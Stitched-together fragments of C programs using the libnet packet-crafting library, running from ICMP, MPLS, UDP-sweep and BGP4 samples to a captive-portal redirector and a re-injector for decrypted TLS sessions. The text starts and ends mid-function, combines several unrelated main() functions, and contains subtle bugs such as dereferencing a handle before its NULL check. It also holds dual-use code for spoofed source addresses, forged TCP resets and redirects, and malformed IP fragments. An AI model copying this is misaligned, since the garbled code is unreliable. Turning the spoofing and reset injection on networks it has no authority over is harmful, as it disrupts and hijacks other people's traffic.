fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
t = libnet_build_icmpv4_timestamp(
ICMP_TSTAMP, /* type */
0, /* code */
0, /* checksum */
242, /* id */
424, /* sequence number */
1000, /* otime */
2000, /* rtime */
3000, /* ttime */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_ICMPV4_TS_H, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_ICMP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte ICMP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
// Handles decrypted data from libdssl
static void data_callback_proc(NM_PacketDir dir, void* user_data, u_char* pkt_payload, uint32_t pkt_size, DSSL_Pkt* last_packet)
{
libnet_ptag_t tcp, ip, ethernet;
register libnet_t *libnet_c;
TcpSession *sess = (TcpSession*) user_data;
uint32_t bytes_written, bytes_to_write;
u_char* payload_ptr;
FakeSessionState *mySession = (FakeSessionState*) sess->user_data;
// Initialise byte counter and payload pointer
bytes_written = 0;
payload_ptr = pkt_payload;
tcp = ip = ethernet = 0;
if (config.loglevel > 0 && !config.daemon)
{
switch(dir)
{
case ePacketDirFromClient:
fprintf(stderr, "\nC->S: %d bytes\n", pkt_size );
break;
case ePacketDirFromServer:
fprintf(stderr, "S->C: %d bytes\n", pkt_size );
break;
default:
fprintf(stderr, "\nUnknown packet direction!");
break;
}
}
// Get libnet context
libnet_c = mySession->ln;
// Send handshake if necessary
if( mySession->handshakeSent == 0 )
{
sendTCPHandshake( libnet_c, sess, mySession );
mySession->handshakeSent = 1;
}
// Split pkt_payload into a 1460 byte MSS
while( bytes_written < pkt_size )
{
// Work out how many bytes to write on this pass
bytes_to_write = ( ( pkt_size - bytes_written ) < 1460 ) ? ( pkt_size - bytes_written ) : 1460;
tcp = libnet_build_tcp(
( dir == ePacketDirFromClient ) ? sess->clientStream.port : ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ), /* source port */
( dir == ePacketDirFromClient ) ? ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ) : sess->clientStream.port, /* destination port */
( dir == ePacketDirFromClient ) ? mySession->clientSeq : mySession->serverSeq, /* sequence number */
( dir == ePacketDirFromClient ) ? mySession->serverSeq : mySession->clientSeq, /* acknowledgement num */
TH_ACK, /* control flags */
32767, /* window size */
0, /* checksum */
10, /* urgent pointer */
LIBNET_TCP_H + bytes_to_write, /* TCP packet size */
payload_ptr, /* payload */
bytes_to_write, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
// Increment count of bytes written
bytes_written += bytes_to_write;
if( dir == ePacketDirFromClient )
mySession->clientSeq += bytes_to_write;
else
mySession->serverSeq += bytes_to_write;
// Increment payload_ptr
payload_ptr += bytes_to_write;
if (tcp == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build TCP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build TCP header: %s.\n", libnet_geterror(libnet_c));
}
else
{
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + bytes_to_write, /* length */
0, /* TOS */
54609, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
( dir == ePacketDirFromClient ) ? sess->clientStream.ip_addr : sess->serverStream.ip_addr, /* source IP */
( dir == ePacketDirFromClient ) ? sess->serverStream.ip_addr : sess->clientStream.ip_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build IP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_c));
}
else
{
ethernet = libnet_build_ethernet(
( dir == ePacketDirFromClient ) ? config.cap[capindex]->dst_interface_mac : config.cap[capindex]->src_interface_mac, /* ethernet destination */
( dir == ePacketDirFromClient ) ? config.cap[capindex]->src_interface_mac : config.cap[capindex]->dst_interface_mac, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ethernet == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build ethernet header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build ethernet header: %s.\n", libnet_geterror(libnet_c));
}
else
{
if (libnet_write(libnet_c) == -1)
{
if (config.daemon)
syslog(LOG_ERR, "write error: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Write error: %s.\n", libnet_geterror(libnet_c));
}
}
}
}
libnet_clear_packet(libnet_c);
}
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
char *device = NULL;
char *dst = "2.2.2.2", *src = "1.1.1.1";
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip_ptag = 0;
u_short proto = IPPROTO_UDP;
u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5};
u_long payload_s = 8;
printf("libnet 1.1 packet shaping: IP + payload[raw]\n");
/*
* handle options
*/
while ((c = getopt(argc, argv, "d:s:tp:i:h")) != EOF)
{
switch (c)
{
case 'd':
dst = optarg;
break;
case 's':
src = optarg;
break;
case 'i':
device = optarg;
break;
case 't':
proto = IPPROTO_TCP;
break;
case 'p':
strncpy((char *)payload, optarg, sizeof(payload)-1);
payload_s = strlen((char *)payload);
break;
case 'h':
usage(argv[0]);
exit(EXIT_SUCCESS);
default:
exit(EXIT_FAILURE);
}
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
device, /* network interface */
errbuf); /* error buffer */
printf("Using device %s\n", l->device);
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", dst);
exit(EXIT_FAILURE);
}
if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", src);
exit(EXIT_FAILURE);
}
/*
* Build the packet
*/
ip_ptag = libnet_build_ipv4(
LIBNET_IPV4_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
proto, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
ip_ptag); /* libnet id */
if (ip_ptag == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte IP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
static int http_redirector(const char *packet_content) {
/*******************************************************************
* here we use TCP
* when we recv a SYN=1,ACK=0 packet, we just send a syn=1,ack=1 packet
* that contains nothing
* then we push a packet taht contains
* HTTP/1.0 302 Found
* Location: http://192.168.0.1/
* connection:close
*
* please visit http://192.168.0.1
* and then we reset the connection
* ****************************************************************/
struct tcphdr * tcp_head;
struct udphdr * udp_head;
struct ether_header *eptr; //以太网帧
struct iphdr *ip_head;
if (packet_content == NULL) {
return 1;
}
eptr = (struct ether_header *) packet_content;
ip_head = (struct iphdr *) (packet_content + sizeof(struct ether_header)); //获得ip数据报的内存地址
//非 enable 的客户端,现在要开始这般处理了,重定向到 ... 嘿嘿
redirector_ip = inet_addr(conf.portal_server_ip);
portal_dev = inet_addr(conf.portal_dev);
if (ip_head->daddr == redirector_ip || ip_head->daddr == portal_dev) {
return 1;
}
if (ip_head->saddr == redirector_ip || ip_head->saddr == portal_dev) {
return 1;
}
struct in_addr tmp;
tmp.s_addr = ip_head->daddr;
if (search(ip_head->daddr) == 1) {
printf("dip:%sok\n", inet_ntoa(tmp));
return 1;
}
tmp.s_addr = ip_head->saddr;
if (search(ip_head->saddr) == 1) {
// printf("sip:%sok\n", inet_ntoa(tmp));
return 1;
}
memset(httphead, 0, sizeof(httphead));
sprintf(httphead,
"HTTP/1.0 302 Found\n"
"Location: http://%s:5246/test/auth.jsp?sip=%s&portal_dev=%s&smac=%s\n"
"Connection:close\n\n"
"<html>\n\t<head>\n\t\t<meta http-equiv=\"Refresh\"content=\"0 ; "
"url=http://%s:5246/test/auth.jsp?sip=%s&portal_dev=%s&smac=%s\">\n\t</head>\n</html>\n",
conf.portal_server_ip, inet_ntoa(tmp), conf.portal_dev, smac,
conf.portal_server_ip, inet_ntoa(tmp), conf.portal_dev, smac);
// conf.authserver, inet_ntoa(tmp), conf.gateway, smac,
// conf.authserver, inet_ntoa(tmp), conf.gateway, smac);
printf("httphead:%s\n", httphead);
//Retrive the tcp header and udp header
tcp_head = (struct tcphdr*) ((char*) ip_head + ip_head->ihl * 4);
udp_head = (struct udphdr*) ((char*) ip_head + ip_head->ihl * 4);
//初始化libnet,每个线程一个 libnet ;)
init_thread_libnet();
// http 重定向
if (ip_head->protocol == IPPROTO_TCP && ntohs(tcp_head->dest) == 80) {
u_int8_t tcp_flags = ((struct libnet_tcp_hdr *) tcp_head)->th_flags;
if (tcp_flags == TH_SYN) {
/********************************
* 对于这样的一个握手数据包
* 我们应该要建立连接了
* 回复一个syn ack 就是了
*********************************/
// here we just echo ack and syn.
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source),
tcp_head->seq, ntohl(tcp_head->seq) + 1, TH_ACK | TH_SYN,
4096, 0, 0, 20, 0, 0, libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
libnet_write(libnet);
libnet_clear_packet(libnet);
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source),
tcp_head->seq, ntohl(tcp_head->seq) + 1, TH_ACK | TH_SYN,
4096, 0, 0, 20, 0, 0, libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
} else if (tcp_flags & (TH_ACK | TH_SYN)) {
/*********************************************
*现在是发送页面的时候啦!
*********************************************/
int SIZEHTTPHEAD = strlen((const char*) httphead);
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source),
ntohl(tcp_head->ack_seq),
ntohl(tcp_head->seq) + ntohs(ip_head->tot_len) - 40,
TH_ACK | TH_PUSH | TH_FIN, 4096, 0, 0, 20 + SIZEHTTPHEAD,
httphead, SIZEHTTPHEAD, libnet, 0);
libnet_build_ipv4(40 + SIZEHTTPHEAD, 0, 0, 0x4000, 63/*ttl*/,
IPPROTO_TCP, 0, ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
} else if (tcp_flags & (TH_FIN | TH_RST)) {
/*********************************************************
*好,现在结束连接!
********************************************************/
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source),
ntohl(tcp_head->ack_seq), ntohl(tcp_head->seq) + 1,
TH_ACK | TH_RST, 4096, 0, 0, 20, 0, 0, libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
printf(
"------------------------------------------------------------------------link disconnect\n");
printf("smac:%s\n", smac);
printf("sip:%sok\n", inet_ntoa(tmp));
} else {
return 0;
}
} //其他 TCP 直接 RST
else if (ip_head->protocol == IPPROTO_TCP) {
libnet_build_tcp(ntohs(tcp_head->dest), ntohs(tcp_head->source),
ntohl(tcp_head->ack_seq), ntohl(tcp_head->seq) + 1,
TH_ACK | TH_RST, 4096, 0, 0, 20, 0, 0, libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_TCP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
} else if (ip_head->protocol == IPPROTO_UDP && udp_head->dest != 53) {
//现在是 UDP 的时代了
libnet_build_udp(ntohs(udp_head->dest), ntohs(udp_head->source),
sizeof(blank) + sizeof(struct udphdr), 0, blank, sizeof(blank),
libnet, 0);
libnet_build_ipv4(40, 0, 0, 0x4000, 63/*ttl*/, IPPROTO_UDP, 0,
ip_head->daddr, ip_head->saddr, 0, 0, libnet, 0);
} else
return 0;
libnet_autobuild_ethernet(eptr->ether_shost,
ETHERTYPE_IP, libnet);
libnet_write(libnet);
libnet_clear_packet(libnet);
return 1;
}
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{
libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;
if (!device)
device = DEVICE;
l = libnet_init (LIBNET_RAW4, device, errbuf);
if (!l) {
fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}
src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);
dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);
src_prt = sPRT ? sPRT : SRC_PRT;
dst_prt = dPRT ? dPRT : DST_PRT;
if (count == 1) {
payload = "\0\0\0\0\0\0\0\0";
payload_s = 8;
}
udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l, udp);
if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
switch (count) {
case 1:
frag = IP_MF;
break;
case 2:
frag = 0x2002;
break;
case 3:
frag = 0x0003;
break;
}
ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);
if (ip == -1) {
fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
c = libnet_write (l);
if (c == -1) {
fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
printf ("Wrote UDP packet; check the wire.\n");
libnet_destroy (l);
return (EXIT_SUCCESS);
}
int main(int argc, char *argv[]) {
if(argc < 5) {
printf("Usage: ./out device local_port remote_addr remote_port\n");
return -1;
}
char *interface = argv[1];
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip_tag = 0, tcp_tag = 0;
u_short proto = IPPROTO_TCP;
int packet_size;
libnet_t *libnet_handler = libnet_init(LIBNET_RAW4_ADV, interface, errbuf);
if(NULL == libnet_handler) {
printf("libnet init failed: %s\n", errbuf);
exit(1);
}
u_long dst_ip = libnet_name2addr4(libnet_handler, argv[3], LIBNET_RESOLVE);
u_long src_ip = libnet_name2addr4(libnet_handler, "0.0.0.0", LIBNET_RESOLVE);
fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
struct sockaddr_in addr;
socklen_t slen = sizeof(addr);
memset((void *)&addr, 0, slen);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
inet_aton("0.0.0.0", &addr.sin_addr);
bind(fd, (const struct sockaddr*)&addr, slen);
u_char buf[BUF_SIZE];
ssize_t recvlen;
while(1) {
recvlen = recvfrom(fd, buf, BUF_SIZE, 0, NULL, NULL);
tcp_tag = libnet_build_tcp(
atoi(argv[2]), /* 源端口 */
atoi(argv[4]), /* 目的端口 */
8888, /* 序列号 */
8889, /* 确认号 */
TH_PUSH | TH_ACK, /* Control flags */
14600, /* 窗口尺寸 */
0, /* 校验和,0为自动计算 */
0, /* 紧急指针 */
LIBNET_TCP_H + recvlen, /* 长度 */
buf, /* 负载内容 */
recvlen, /* 负载内容长度 */
libnet_handler, /* libnet句柄 */
tcp_tag /* 新建包 */
);
if (tcp_tag == -1) {
printf("libnet_build_tcp failure\n");
continue;
};
/* 构造IP协议块,返回值是新生成的IP协议快的一个标记 */
ip_tag = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + recvlen, /* IP协议块的总长,*/
0, /* tos */
(u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
0, /* frag 片偏移 */
(u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
proto, /* 上层协议 */
0, /* 校验和,此时为0,表示由Libnet自动计算 */
src_ip, /* 源IP地址,网络序 */
dst_ip, /* 目标IP地址,网络序 */
NULL, /* 负载内容或为NULL */
0, /* 负载内容的大小*/
libnet_handler, /* Libnet句柄 */
ip_tag /* 协议块标记可修改或创建,0表示构造一个新的*/
);
if (ip_tag == -1) {
printf("libnet_build_ipv4 failure\n");
return (-4);
};
packet_size = libnet_write(libnet_handler);
//libnet_clear_packet(libnet_handler);
}
libnet_destroy(libnet_handler);
}
int
main(int argc, char *argv[])
{
int c;
char *cp;
libnet_t *l;
libnet_ptag_t t;
u_char *payload;
u_long payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: MPLS[link]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK_ADV, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)payload);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
t = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
0xffffffff, /* sequence number */
0x00000000, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + payload_s, /* TCP packet size */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_mpls(
29, /* label */
4, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
0xff, /* ttl */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_mpls(
39, /* label */
5, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
0xef, /* ttl */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_mpls(
59, /* label */
6, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
0x0f, /* ttl */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
enet_dst, /* ethernet destination */
enet_src, /* ethernet source */
ETHERTYPE_MPLS, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte MPLS frame; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char **argv)
{
int c, build_ip;
struct timeval r;
struct timeval s;
struct timeval e;
libnet_t *l;
libnet_ptag_t udp;
char *payload;
libnet_ptag_t t;
struct libnet_stats ls;
u_short payload_s;
u_long src_ip, dst_ip;
u_short bport, eport, cport;
libnet_plist_t plist, *plist_p;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1.0 packet shaping: UDP2[link]\n");
l = libnet_init(
LIBNET_LINK, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
payload = NULL;
payload_s = 0;
plist_p = NULL;
while ((c = getopt(argc, argv, "d:s:p:P:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
case 'P':
plist_p = &plist;
if (libnet_plist_chain_new(l, &plist_p, optarg) == -1)
{
fprintf(stderr, "Bad token in port list: %s\n",
libnet_geterror(l));
exit(1);
}
break;
case 'p':
payload = optarg;
payload_s = strlen(payload);
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip || !plist_p)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
udp = 0;
#if !(__WIN32__)
gettimeofday(&s, NULL);
#else
/* This obviously is not as good - but it compiles now. */
s.tv_sec = time(NULL);
s.tv_usec = 0;
#endif
build_ip = 1;
while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
{
while (!(bport > eport) && bport != 0)
{
cport = bport++;
udp = libnet_build_udp(
1025, /* source port */
cport, /* destination port */
LIBNET_UDP_H + payload_s, /* packet size */
0, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
udp); /* libnet id */
if (udp == -1)
{
fprintf(stderr, "Can't build UDP header (at port %d): %s\n",
cport, libnet_geterror(l));
goto bad;
}
if (build_ip)
{
build_ip = 0;
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
enet_dst, /* ethernet destination */
enet_src, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0);
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
}
//usleep(100);
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "write error: %s\n", libnet_geterror(l));
}
else
{
fprintf(stderr, "wrote %d UDP packet to port %d\n", c, cport);
// fprintf(stderr, ".");
}
}
}
#if !(__WIN32__)
gettimeofday(&s, NULL);
#else
/* This obviously is not as good - but it compiles now. */
s.tv_sec = time(NULL);
s.tv_usec = 0;
#endif
libnet_timersub(&e, &s, &r);
fprintf(stderr, "Total time spent in loop: %ld.%ld\n", r.tv_sec, r.tv_usec);
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
u_short u_rt_l = 0;
u_char *withdraw_rt = NULL;
char flag_w = 0;
u_short attr_l = 0;
u_char *attr = NULL;
char flag_a = 0;
u_short info_l = 0;
u_char *info = NULL;
char flag_i = 0;
printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)payload);
break;
case 'w':
withdraw_rt = (u_char *)optarg;
break;
case 'W':
u_rt_l = atoi(optarg);
break;
case 'a':
attr = (u_char *)optarg;
break;
case 'A':
attr_l = atoi(optarg);
break;
case 'i':
info = (u_char *)optarg;
break;
case 'I':
info_l = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
goto bad;
}
set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);
set_ptr_and_size(attr, attr_l, 0x42, flag_a);
set_ptr_and_size(info, info_l, 0x43, flag_i);
/*
* BGP4 update messages are "dynamic" are fields have variable size. The only
* sizes we know are those for the 2 first fields ... so we need to count them
* plus their value.
*/
length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;
t = libnet_build_bgp4_update(
u_rt_l, /* Unfeasible Routes Length */
withdraw_rt, /* Withdrawn Routes */
attr_l, /* Total Path Attribute Length */
attr, /* Path Attributes */
info_l, /* Network Layer Reachability Information length */
info, /* Network Layer Reachability Information */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_BGP4_HEADER_H;
